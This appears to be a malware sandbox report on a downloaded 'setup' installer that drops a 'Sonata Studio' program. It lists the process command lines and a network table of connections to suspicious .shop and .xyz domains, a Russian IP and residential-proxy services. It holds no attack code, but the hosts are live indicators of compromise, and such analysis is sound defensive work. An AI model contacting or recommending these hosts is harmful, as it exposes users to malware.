"C:\Users\Admin\AppData\Local\Temp\is-KSFSM.tmp\setup_6nBN3qWfKP.tmp" /SL5="$206C8,6748576,56832,C:\Users\Admin\Downloads\setup_6nBN3qWfKP\setup_6nBN3qWfKP.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2856 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4652,i,16364939615175192899,1737928543442699332,262144 --variations-seed-version --mojo-platform-channel-handle=6208 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4532,i,16364939615175192899,1737928543442699332,262144 --variations-seed-version --mojo-platform-channel-handle=7228 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7196,i,16364939615175192899,1737928543442699332,262144 --variations-seed-version --mojo-platform-channel-handle=7288 /prefetch:8
C:\Users\Admin\Downloads\setup_6nBN3qWfKP\setup_6nBN3qWfKP.exe
"C:\Users\Admin\Downloads\setup_6nBN3qWfKP\setup_6nBN3qWfKP.exe"
C:\Users\Admin\AppData\Local\Temp\is-HV156.tmp\setup_6nBN3qWfKP.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HV156.tmp\setup_6nBN3qWfKP.tmp" /SL5="$306BA,6748576,56832,C:\Users\Admin\Downloads\setup_6nBN3qWfKP\setup_6nBN3qWfKP.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Sonata_Studio_5241"
C:\Users\Admin\AppData\Local\Sonata Studio\sonatastudio.exe
"C:\Users\Admin\AppData\Local\Sonata Studio\sonatastudio.exe" 0cf00d82ea3c522517754f1ee63873d1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 7496 -ip 7496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7496 -s 140
C:\Users\Admin\Downloads\setup_6nBN3qWfKP\setup_6nBN3qWfKP.exe
"C:\Users\Admin\Downloads\setup_6nBN3qWfKP\setup_6nBN3qWfKP.exe"
C:\Users\Admin\AppData\Local\Temp\is-DBO5A.tmp\setup_6nBN3qWfKP.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DBO5A.tmp\setup_6nBN3qWfKP.tmp" /SL5="$606C2,6748576,56832,C:\Users\Admin\Downloads\setup_6nBN3qWfKP\setup_6nBN3qWfKP.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --field-trial-handle=5492,i,16364939615175192899,1737928543442699332,262144 --variations-seed-version --mojo-platform-channel-handle=1672 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=5384 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=2632 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=5384 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=2644 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=7196 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=7020 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=6360 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=7444 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1384
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=6976 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=7308 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=6888 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=7700 --field-trial-handle=1932,i,15593367728471808137,704386900650443556,131072 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | joseernestoongithub.github.io | udp |
| US | 185.199.111.153:443 | joseernestoongithub.github.io | tcp |
| US | 8.8.8.8:53 | mirrors.creativecommons.org | udp |
| US | 8.8.8.8:53 | translate.google.com | udp |
| US | 172.67.1.191:443 | mirrors.creativecommons.org | tcp |
| US | 172.67.1.191:443 | mirrors.creativecommons.org | tcp |
| GB | 142.250.187.238:443 | translate.google.com | tcp |
| US | 8.8.8.8:53 | translate.googleapis.com | udp |
| GB | 142.250.187.202:443 | translate.googleapis.com | tcp |
| US | 8.8.8.8:53 | translate-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 153.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.1.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | 42.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blltly.com | udp |
| US | 172.67.179.232:443 | blltly.com | tcp |
| US | 172.67.179.232:443 | blltly.com | tcp |
| US | 8.8.8.8:53 | soneremonasez.shop | udp |
| US | 104.21.67.200:443 | soneremonasez.shop | tcp |
| US | 8.8.8.8:53 | www.hcaptcha.com | udp |
| US | 104.19.229.21:443 | www.hcaptcha.com | tcp |
| US | 104.21.67.200:443 | soneremonasez.shop | udp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | newassets.hcaptcha.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 104.19.229.21:443 | newassets.hcaptcha.com | udp |
| US | 8.8.8.8:53 | 232.179.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.67.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.229.19.104.in-addr.arpa | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 8.8.8.8:53 | api.hcaptcha.com | udp |
| GB | 142.250.187.202:443 | content-autofill.googleapis.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.80.190.35.in-addr.arpa | udp |
| US | 104.19.230.21:443 | api.hcaptcha.com | udp |
| US | 8.8.8.8:53 | imgs3.hcaptcha.com | udp |
| US | 8.8.8.8:53 | 21.230.19.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | 229.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.25.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | soneremonasez.shop | udp |
| US | 8.8.8.8:53 | soneremonasez.shop | udp |
| US | 172.67.180.145:443 | soneremonasez.shop | tcp |
| US | 8.8.8.8:53 | soneremonasez.shop | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 13.107.6.158:443 | business.bing.com | tcp |
| US | 172.67.180.145:443 | soneremonasez.shop | udp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 2.17.251.21:443 | bzib.nelreports.net | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 142.250.178.14:443 | google.com | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| GB | 142.250.178.14:443 | google.com | udp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| GB | 13.87.96.169:443 | nav-edge.smartscreen.microsoft.com | tcp |
| GB | 13.87.96.169:443 | nav-edge.smartscreen.microsoft.com | tcp |
| GB | 13.87.96.169:443 | nav-edge.smartscreen.microsoft.com | tcp |
| GB | 13.87.96.169:443 | nav-edge.smartscreen.microsoft.com | tcp |
| GB | 13.87.96.169:443 | nav-edge.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | 145.180.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.24.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 169.96.87.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | soneremonasez.shop | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | senzamenuzaes.shop | udp |
| US | 8.8.8.8:53 | senzamenuzaes.shop | udp |
| US | 8.8.8.8:53 | senzamenuzaes.shop | udp |
| US | 172.67.138.9:443 | senzamenuzaes.shop | udp |
| US | 8.8.8.8:53 | 9.138.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dl-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | dl-edge.smartscreen.microsoft.com | udp |
| GB | 172.165.69.228:443 | dl-edge.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | 228.69.165.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | soneservice.shop | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.74.21.104.in-addr.arpa | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 8.8.8.8:53 | totrakto.com | udp |
| NL | 5.149.248.111:80 | totrakto.com | tcp |
| US | 8.8.8.8:53 | 111.248.149.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | totrakto.com | udp |
| US | 8.8.8.8:53 | totrakto.com | udp |
| US | 8.8.8.8:53 | totrakto.com | udp |
| NL | 5.149.248.111:80 | totrakto.com | tcp |
| NL | 5.149.248.111:80 | totrakto.com | tcp |
| US | 8.8.8.8:53 | totrakto.com | udp |
| US | 8.8.8.8:53 | totrakto.com | udp |
| US | 8.8.8.8:53 | totrakto.com | udp |
| NL | 5.149.248.111:443 | totrakto.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| NL | 23.63.101.153:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | totrakto.com | udp |
| US | 8.8.8.8:53 | 153.101.63.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.97.55.23.in-addr.arpa | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| NL | 185.26.182.112:443 | net.geo.opera.com | tcp |
| RU | 95.163.241.63:80 | 95.163.241.63 | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 8.8.8.8:53 | 112.182.26.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.241.163.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | files.wproxy.me | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| NL | 109.236.84.9:80 | files.wproxy.me | tcp |
| US | 8.8.8.8:53 | chatgptencoder.site | udp |
| US | 104.21.84.192:443 | chatgptencoder.site | tcp |
| US | 8.8.8.8:53 | 9.84.236.109.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bobisawinner.xyz | udp |
| SE | 185.117.88.231:80 | bobisawinner.xyz | tcp |
| US | 8.8.8.8:53 | 192.84.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.88.117.185.in-addr.arpa | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| SE | 185.117.88.231:80 | bobisawinner.xyz | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 8.8.8.8:53 | desktop-netinstaller-sub.osp.opera.software | udp |
| US | 8.8.8.8:53 | autoupdate.geo.opera.com | udp |
| NL | 185.26.182.123:443 | autoupdate.geo.opera.com | tcp |
| NL | 185.26.182.123:443 | autoupdate.geo.opera.com | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 8.8.8.8:53 | features.opera-api2.com | udp |
| US | 8.8.8.8:53 | download.opera.com | udp |
| NL | 82.145.216.15:443 | features.opera-api2.com | tcp |
| NL | 185.26.182.117:443 | download.opera.com | tcp |
| US | 8.8.8.8:53 | 123.182.26.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.217.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.216.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.182.26.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | download5.operacdn.com | udp |
| US | 104.18.10.89:443 | download5.operacdn.com | tcp |
| US | 8.8.8.8:53 | 89.10.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-mobile-static.azureedge.net | tcp |
| GB | 216.58.204.67:443 | update.googleapis.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 67.204.58.216.in-addr.arpa | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 8.8.8.8:53 | www.ratondownload.org | udp |
| US | 104.21.54.236:443 | www.ratondownload.org | tcp |
| US | 104.21.54.236:443 | www.ratondownload.org | tcp |
| US | 8.8.8.8:53 | 236.54.21.104.in-addr.arpa | udp |
| US | 104.21.54.236:443 | www.ratondownload.org | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 8.8.8.8:53 | maxcdn.bootstrapcdn.com | udp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| US | 104.18.11.207:443 | maxcdn.bootstrapcdn.com | tcp |
| GB | 142.250.178.10:443 | ajax.googleapis.com | tcp |
| US | 8.8.8.8:53 | tag.installp.com | udp |
| US | 8.8.8.8:53 | 2.bp.blogspot.com | udp |
| US | 8.8.8.8:53 | connect.facebook.net | udp |
| US | 172.67.185.207:443 | tag.installp.com | tcp |
| US | 8.8.8.8:53 | 1.bp.blogspot.com | udp |
| GB | 163.70.151.21:443 | connect.facebook.net | tcp |
| US | 104.18.11.207:443 | maxcdn.bootstrapcdn.com | udp |
| GB | 142.250.180.1:443 | 1.bp.blogspot.com | tcp |
| GB | 142.250.180.1:443 | 1.bp.blogspot.com | tcp |
| GB | 163.70.151.21:443 | connect.facebook.net | udp |
| US | 8.8.8.8:53 | api.installp.com | udp |
| US | 104.21.84.33:443 | api.installp.com | tcp |
| US | 8.8.8.8:53 | 207.11.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.185.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s10.histats.com | udp |
| US | 104.20.19.71:443 | s10.histats.com | tcp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| US | 8.8.8.8:53 | s4.histats.com | udp |
| GB | 157.240.221.35:443 | www.facebook.com | tcp |
| CA | 149.56.240.129:443 | s4.histats.com | tcp |
| US | 8.8.8.8:53 | e.dtscout.com | udp |
| DE | 141.101.120.11:443 | e.dtscout.com | tcp |
| US | 8.8.8.8:53 | static.xx.fbcdn.net | udp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| US | 8.8.8.8:53 | 33.84.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.dtscout.com | udp |
| US | 8.8.8.8:53 | dtsedge.com | udp |
| US | 8.8.8.8:53 | 14.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.19.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.221.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.240.56.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.120.101.141.in-addr.arpa | udp |
| US | 172.67.157.200:443 | dtsedge.com | tcp |
| US | 8.8.8.8:53 | check.peer2profit.site | udp |
| US | 104.21.37.169:443 | check.peer2profit.site | tcp |
| US | 8.8.8.8:53 | api.peer2profit.global | udp |
| US | 104.21.58.202:443 | api.peer2profit.global | tcp |
| US | 8.8.8.8:53 | scontent.xx.fbcdn.net | udp |
| GB | 163.70.151.21:443 | scontent.xx.fbcdn.net | udp |
| US | 8.8.8.8:53 | 200.157.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.37.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.58.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | log.wproxy.me | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| DE | 148.251.234.93:443 | log.wproxy.me | tcp |
| US | 8.8.8.8:53 | 93.234.251.148.in-addr.arpa | udp |
| US | 8.8.8.8:53 | direct25845.mitoerliste.space | udp |
| US | 172.67.178.57:443 | direct25845.mitoerliste.space | tcp |
| US | 172.67.178.57:443 | direct25845.mitoerliste.space | tcp |
| US | 104.21.58.202:443 | api.peer2profit.global | tcp |
| US | 8.8.8.8:53 | spacedowns.com | udp |
| US | 104.21.39.249:443 | spacedowns.com | tcp |
| US | 104.21.39.249:443 | spacedowns.com | tcp |
| US | 8.8.8.8:53 | 249.39.21.104.in-addr.arpa | udp |
| US | 104.21.39.249:443 | spacedowns.com | udp |
| US | 8.8.8.8:53 | javascriptcontent.com | udp |
| US | 172.67.74.11:443 | javascriptcontent.com | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| GB | 157.240.221.35:443 | www.facebook.com | udp |
| US | 8.8.8.8:53 | 11.74.67.172.in-addr.arpa | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| US | 8.8.8.8:53 | 148.97.6.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | crls.ssl.com | udp |
| FR | 18.161.97.28:80 | crls.ssl.com | tcp |
| US | 8.8.8.8:53 | s3.us-east-2.amazonaws.com | udp |
| US | 52.219.94.241:443 | s3.us-east-2.amazonaws.com | tcp |
| US | 52.219.94.241:443 | s3.us-east-2.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 28.97.161.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.94.219.52.in-addr.arpa | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| BE | 23.55.97.11:80 | x2.c.lencr.org | tcp |
| N/A | 10.127.0.1:5351 | udp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | peer.repocket.com | udp |
| US | 104.21.69.4:443 | peer.repocket.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.69.21.104.in-addr.arpa | udp |
| FR | 45.32.147.2:7070 | tcp | |
| US | 8.8.8.8:53 | 2.147.32.45.in-addr.arpa | udp |
| FR | 45.32.147.2:7072 | tcp | |
| N/A | 10.127.0.1:5351 | udp | |
| US | 8.8.8.8:53 | verification.repocket.co | udp |
| US | 172.67.142.108:80 | verification.repocket.co | tcp |
| US | 8.8.8.8:53 | 108.142.67.172.in-addr.arpa | udp |
| GB | 54.38.210.150:443 | tcp | |
| US | 8.8.8.8:53 | api.iproyal.com | udp |
| NL | 193.228.196.69:443 | api.iproyal.com | tcp |
| US | 8.8.8.8:53 | 150.210.38.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.196.228.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp |
| US | 8.8.8.8:53 | fp-3.check.ipcheckhost.com | udp |
| GB | 81.17.60.133:443 | fp-3.check.ipcheckhost.com | tcp |
| GB | 54.38.210.150:443 | tcp | |
| US | 8.8.8.8:53 | ubuntu.com | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 151.101.130.167:443 | twitch.tv | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 185.125.190.21:443 | ubuntu.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| GB | 54.38.210.150:443 | tcp | |
| GB | 54.38.210.150:443 | tcp | |
| GB | 54.38.210.150:443 | tcp | |
| GB | 54.38.210.150:443 | tcp | |
| GB | 54.38.210.150:443 | tcp | |
| GB | 151.101.62.167:443 | www.twitch.tv | tcp |
| GB | 54.38.210.150:443 | tcp | |
| GB | 95.168.184.125:443 | fp-4.check.ipcheckhost.com | tcp |
| GB | 54.38.210.150:443 | tcp | |
| US | 8.8.8.8:53 | 133.60.17.81.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.130.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.190.125.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.62.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.184.168.95.in-addr.arpa | udp |
| GB | 81.17.60.133:443 | fp-3.check.ipcheckhost.com | tcp |
| GB | 54.38.210.150:443 | tcp | |
| DE | 144.76.114.3:80 | api.blocklist.de | tcp |
| GB | 54.38.210.150:443 | tcp | |
| FR | 18.161.97.31:443 | otx.alienvault.com | tcp |
| GB | 54.38.210.150:443 | tcp | |
| US | 8.8.8.8:53 | 31.97.161.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.114.76.144.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipv6-api.iproyal.com | udp |
| DE | 91.239.130.49:443 | tcp | |
| US | 8.8.8.8:53 | api6.my-ip.io | udp |
| US | 8.8.8.8:53 | 39.209.101.191.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.iproyal.com | udp |
| DE | 93.189.62.83:443 | api.iproyal.com | tcp |
| US | 8.8.8.8:53 | 49.130.239.91.in-addr.arpa | udp |
